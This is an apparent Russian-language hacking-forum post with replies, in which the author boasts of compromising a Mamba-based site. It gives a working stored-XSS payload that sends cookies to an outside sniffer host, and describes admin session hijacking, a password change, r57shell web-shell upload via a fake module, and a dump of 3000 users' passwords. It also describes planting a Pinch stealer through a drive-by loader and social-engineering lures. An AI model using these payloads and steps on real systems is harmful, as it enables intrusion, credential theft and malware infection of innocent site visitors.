## new_x55 на движке Mamba ## Это моя первая статья и просвещенна она взлому сайта при помощи xss. Прошу сильно не бить действительно это мой первый опыт! Одним днем, когда делать было не чего я просматривал все знакомые мне форумы и сайты: оставлял сообщения, читал чужые и тд. Мне захотелось взломать один сайт, на котором стояла Mamba. По привычке запустил NMAP и полез на секлаб посмотреть нет ли уязвимостей у этого движка. Через минут десять NMAP показал список установленных сервисов, но нечего мне это не дало, так как все они были достаточно новые, так же в багтраках ничего не нашлось. Я думал уже плюнуть на сайт, но что то мне подсказывало, где то есть все таки брешь! Ну я и принялся проверять скрипты: подставлять заветную кавычку и это тоже мне не дало результатов. Потом я зашел в свои данные на сайте(я был зарегистрирован на этом сайте) и начал упорно вставлять банальную XSS и опять как на зло результатов не было! Время было позднее и надо было что-то делать, тогда я принялся за форум и начал постить сообщения, в надежде на XSS-уязвимость и наконец свершилось: была найдена XSS-уязвимость: PHP: [image=http://ya.ru/1.gif OnError="alert(document.cookie)"][/image] и вот меня приветствуют мои Куки! Я быстренько зарегал себе сниффер на http://s.netsec.ru . Изменил значение ядовитой XSS и она приняла вид: PHP: [image=http://ya.ru/1.gif OnError="open('http://s.netsec.ru/sniffer.gif?'+document.cookie)"][/image] . И я стал ждать когда же админ зайдет на этот пост… Прошло минут двадцать как у меня уже появились Куки админа. Я быстренько полез в настройке моей любимой Oper'ы и поменял мои Куки на админские. И вот оно сообщение: Добро пожаловать admin! Итак я радостно полез в админку, но тут меня остановили и потребовали пароль! Недолго думая я залез в личные данные админа и поменял его пароль на 123! Теперь я мог свободно зайти в админку и начал быстро искать заветную строчку: залить шелл! Но такой к сожалению не оказалось, а жаль, но за то была: загрузить новый модуль! Притом файлы надо было запаковать в архив, не долго думаю я уже нажимал отправить! Вдруг выскочила ошибка: мол ну типа что-то тут у тебя не правильно! Хм… Зашел на Яндекс и написал модули для Мамбы и скачал один из них. Оказывается он стоял из xml и php файлов. Я удалил php файл и за место него поставил всем известный r57shell и снова заархивировал. Вот он ответственный момент: я нажимаю кнопку Загрузить. Ага все ок наш модуль установлен и на него выведена ссылка, быстренько кликаю на не и вот перед о мной шелл. Итак я через него заливаю второй шелл, предварительно переименовав, и кинул в самую жопу, чтоб не палился. Удаляем установленный модуль с шеллом, чтобы не палиться и заходим в новый. Итак у нас Фрибзд новой ветки, да тут рута не получишь =(( Но не беда быстренько сделал дамп очень большой базы и кидаю себе на комп. В базе всего 3000 юзеров и что интересное в базе были найдены пароли от других сайтов! Тут я встал пред выбором, а что собственно делать дальше установить проксю или … Я скопировал ссылку шелла и бросил к себе в файл Заначка. Но потом когда я увидел что у большенства народа шести знак это на меня навело идейку а не кинуть ли мне на сайт пинча! Итак я быстренько добавил код на главную страницу автоматического загрузчика файлов, написанного на Яве. И пошел спать… На следующий день, когда я зашел на свое мыло это просто было невероятно стока отчетов от пинча е-мое! Потихоньку стал их разбирать среди обыкновенных девяток лежали и шести знаки и не только пароли к фтп, к мылу и тд. Вот это выдался взомчик!
Взлом конечно нормальный ! А в статью можно было оформить и получше и посодержательней ! А так как для первого раза то вполне сойдет !
Да уж, какое тут паливо... А обратно пароль ты само собой не вернул. Действительно, как админу догадаться... Советую никогда не менять содержимое индекса, вставляя туда всякие пинчи, если так палишься.
Там ретрив есть я ему пароль на мыло отослал! А пинч я зашифровал ну всмысле сжал его специальной прогой,что бы не палился! На Яве был старый эксплоит, так как улова было мало. Я воспользовался соц.инжен и это дало больше результата, ну типа Сотрите народ прикаляха вот ссылка на скачку! Там лежал пинч+флешка и значок я переделал под флешку и все!
Не наю на локал долго ставить, не хотел а xss долго искал, я например писал а потом нажимал: Предворительный просмотр! И все...
Из всей "статьи" считаю лишь интересным - саму Xss. Далее - стандартная незаконченная схема. Можно попытаться получить Ssh (если он доступен на хосте) и поднять права.
Да есть там SSH! А поподробнее как это зделать можешь объяснить я в этом деле можно сказать еще навичоГГГ...
